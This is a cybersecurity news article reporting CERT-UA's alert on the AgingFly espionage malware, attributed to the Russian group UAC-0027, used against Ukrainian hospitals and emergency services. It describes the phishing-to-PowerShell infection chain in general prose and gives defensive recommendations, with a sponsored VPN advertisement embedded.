NewsNukem
Geopolitics

Ukrainian emergency services and hospitals hit by espionage campaign using new AgingFly malware

April 17, 20267 min read2 sources
Share:
Ukrainian emergency services and hospitals hit by espionage campaign using new AgingFly malware

Introduction

A persistent Russian state-sponsored hacking group has been linked to a new cyber-espionage campaign targeting critical Ukrainian infrastructure, including hospitals, local government bodies, and the nation's State Emergency Service. According to an alert from Ukraine's Computer Emergency Response Team (CERT-UA), the campaign leverages a previously undocumented malware tool named AgingFly, underscoring the adversary's continuous development of custom tooling to sustain its intelligence-gathering operations against Ukraine.

Background: The Relentless Campaign of UAC-0027

The threat actor attributed to this activity is UAC-0027, a group widely known in the cybersecurity community as Gamaredon, Pterodo, or Armageddon. Active since at least 2013, UAC-0027 is believed to be an arm of Russia's Federal Security Service (FSB) and has maintained a singular, intense focus on Ukrainian targets. Their operations are characterized by high-volume spear-phishing campaigns designed for widespread, persistent access to government, military, and critical infrastructure networks.

This latest campaign, observed in late 2023 and early 2024, is not a deviation from their long-term strategy but an evolution of their tactics. By deploying a new malware family, the group aims to bypass existing security measures and refresh its toolkit to ensure its espionage objectives are met. The targeting of emergency services and healthcare providers is a calculated move, seeking intelligence that provides insight into Ukraine's civil response capabilities, resource allocation, and societal resilience amidst the ongoing conflict.

Technical Breakdown: How AgingFly Infects a System

The attack chain documented by CERT-UA follows a familiar, yet effective, playbook centered on social engineering. The campaign relies on user interaction rather than exploiting software vulnerabilities for initial access.

  1. Initial Access via Spear-Phishing: The attack begins with a carefully crafted spear-phishing email. These emails are designed to appear legitimate, often containing themes relevant to the target organization. For instance, lures have included documents named “Civil Defense Action Plan.” The emails carry a malicious attachment, typically a RAR archive.
  2. LNK File Execution: Inside the archive, the victim finds a Windows Shortcut file (.LNK) masquerading as a document. When the user double-clicks this file, it does not open a document but instead executes a hidden command.
  3. PowerShell Deployment: The LNK file's primary function is to launch a PowerShell script. PowerShell is a powerful command-line tool built into Windows, making it a favorite for attackers as its activity can blend with legitimate administrative tasks. This script is responsible for the next stage of the infection.
  4. Payload Delivery and Persistence: The PowerShell script connects to an attacker-controlled server to download and execute the main payload: the AgingFly malware. AgingFly is typically a Dynamic Link Library (DLL) file. To ensure it survives a system reboot, the malware establishes persistence by creating a scheduled task that relaunches it at regular intervals.

Capabilities of the AgingFly Malware

Once active on a compromised system, AgingFly functions as a dedicated espionage tool. Its primary capabilities include:

  • System Profiling: It gathers extensive information about the infected machine, including its name, the current user, operating system version, installed software, and network configuration.
  • Data Reconnaissance: The malware scans the system for files of interest, likely based on keywords, file types, or specific locations relevant to the targeted organization.
  • Screen Capture: AgingFly can take screenshots of the user's desktop, providing the attackers with a real-time view of the victim's activities, open documents, and communications.
  • Data Exfiltration: Collected data is packaged and sent to command-and-control (C2) servers managed by UAC-0027. The malware demonstrates flexibility in its exfiltration channels, using a mix of legitimate services to hide its traffic. CERT-UA observed the use of Telegram for initial C2 communication, as well as FTP (File Transfer Protocol) and WebDAV for uploading stolen files. Using common services like Telegram makes malicious traffic harder to detect and block.

Impact Assessment: Targeting the Heart of Civil Infrastructure

The targeting of emergency services and hospitals is strategically significant and carries severe potential consequences. While this campaign appears focused on espionage rather than immediate destruction, the intelligence gathered can be weaponized in numerous ways.

Affected Organizations: The primary targets are the State Emergency Service of Ukraine (SFS), various hospitals, and local government bodies. These organizations form the backbone of Ukraine's civil defense and humanitarian response.

Severity and Consequences:

  • Intelligence Loss: The exfiltration of data from these entities could provide Russian military and intelligence agencies with critical insights. This includes emergency response plans, locations of shelters, casualty statistics, resource and supply chain information for hospitals, and sensitive government communications. Such intelligence could be used to refine military targeting, exploit civil vulnerabilities, or inform propaganda efforts.
  • Humanitarian Risks: Attacks on the healthcare sector are particularly concerning. The compromise of patient data, including that of military personnel or government officials, represents a serious privacy breach. Furthermore, the presence of malware on hospital networks, even for espionage, poses an indirect risk of disrupting critical medical services, either through system instability or by providing an access point for a future destructive attack.
  • Erosion of Trust: Persistent cyberattacks against essential public services can undermine citizens' trust in the government's ability to protect them and their data, a key objective in hybrid warfare.
  • Resource Drain: For Ukrainian defenders, the continuous need to detect, analyze, and remediate infections from persistent actors like UAC-0027 drains valuable time and resources that are already stretched thin.

How to Protect Yourself and Your Organization

Defending against a persistent and adaptive threat like UAC-0027 requires a multi-layered security approach. Organizations, particularly those in critical sectors, should take immediate steps to harden their defenses.

For Organizations:

  • User Training and Awareness: Since the primary attack vector is phishing, educating employees to recognize and report suspicious emails is the first line of defense. Emphasize the danger of opening attachments, especially archives like RAR or ZIP, from unverified sources.
  • Email Security: Implement advanced email filtering solutions to block malicious attachments and links before they reach user inboxes.
  • Endpoint Detection and Response (EDR): Deploy EDR solutions to monitor for suspicious process execution, such as PowerShell being launched by a shortcut file. Use the Indicators of Compromise (IOCs) published by CERT-UA to hunt for signs of AgingFly activity.
  • Restrict Scripting Environments: If not required for administrative duties, restrict the use of PowerShell by enforcing execution policies.
  • Network Monitoring: Monitor outbound network traffic for unusual connections, especially to known C2 infrastructure or services like Telegram, FTP, and WebDAV that are not typically used for business purposes. While not a direct defense against malware, using a trusted hide.me VPN for remote access can help secure network communications and add a layer of encryption.

For Individuals:

  • Practice Email Skepticism: Be wary of any unsolicited email, especially those that create a sense of urgency or ask you to open an attachment. Verify the sender's identity through a separate communication channel if you have any doubts.
  • Reveal File Extensions: In Windows, change the settings to show file extensions. This makes it easier to spot a malicious file like `document.docx.lnk` that is pretending to be a Word document.
  • Use Antivirus Software: Ensure you have a reputable antivirus or anti-malware solution installed and that it is kept up to date.

The AgingFly campaign is a stark reminder that the cyber front of the Russia-Ukraine war is active and evolving. The deliberate targeting of humanitarian and civil organizations highlights the adversary's commitment to intelligence gathering by any means necessary. For defenders in Ukraine and their allies, vigilance and proactive threat hunting remain essential tools in countering this persistent threat.

$ vpn --status: UNPROTECTED

Your connection is exposed.

Encrypt your traffic with hide.me VPN — trusted by security professionals.

Get Protected →

sponsored

Share:

// FAQ

What is AgingFly?

AgingFly is a new malware tool used for cyber-espionage. Its capabilities include collecting system information, taking screenshots, and stealing files from an infected computer. It was first identified in a campaign against Ukrainian critical infrastructure in early 2024.

Who is behind the AgingFly malware campaign?

The campaign is attributed to UAC-0027, a Russian state-sponsored threat group also known as Gamaredon or Armageddon. This group is believed to be affiliated with Russia's Federal Security Service (FSB) and has a long history of targeting Ukraine.

Why are hospitals and emergency services being targeted?

These organizations are targeted for intelligence gathering. Gaining access to their networks can provide the attackers with sensitive information about civil defense plans, resource allocation, casualty numbers, and other data that is valuable for military and political strategy in an ongoing conflict.

How does the AgingFly infection start?

The infection typically starts with a spear-phishing email containing a malicious attachment, such as a RAR archive. Inside the archive is a Windows Shortcut (.LNK) file disguised as a document. When the user opens the LNK file, it executes a PowerShell script that downloads and runs the AgingFly malware.

Is this attack destructive?

The primary goal of the AgingFly campaign appears to be espionage and data theft, not destruction. However, the presence of any malware on critical systems carries an inherent risk of causing instability or providing a foothold for a future, more destructive attack.

// SOURCES

// RELATED

US nationals jailed for operating fake remote worker laptop farms for North Korea
Geopolitics

US nationals jailed for operating fake remote worker laptop farms for North Korea

Two US nationals have been jailed for helping North Korean IT workers infiltrate over 100 American firms, funneling millions to the DPRK's weapons pro

6 min readApr 17
The digital front: Analyzing Iran's cyber warfare capabilities in geopolitical conflict
Geopolitics

The digital front: Analyzing Iran's cyber warfare capabilities in geopolitical conflict

A deep dive into Iran's state-sponsored cyber capabilities, analyzing potential attack scenarios, target sectors, and the critical steps businesses mu

6 min readApr 17
When drones attack: Analyzing the cyber-physical threat to critical infrastructure
Geopolitics

When drones attack: Analyzing the cyber-physical threat to critical infrastructure

A deep-dive into the May 2024 drone attack on Russia's Afipsky oil refinery, analyzing it as a case study in converged cyber-physical warfare.

6 min readApr 17
Attempted breach of Swedish power plant highlights escalating cyber front in European energy sector
Geopolitics

Attempted breach of Swedish power plant highlights escalating cyber front in European energy sector

A failed 2022 cyberattack on a Swedish power plant, disclosed by officials, reveals the escalating threat pro-Russian actors pose to European critical

6 min readApr 16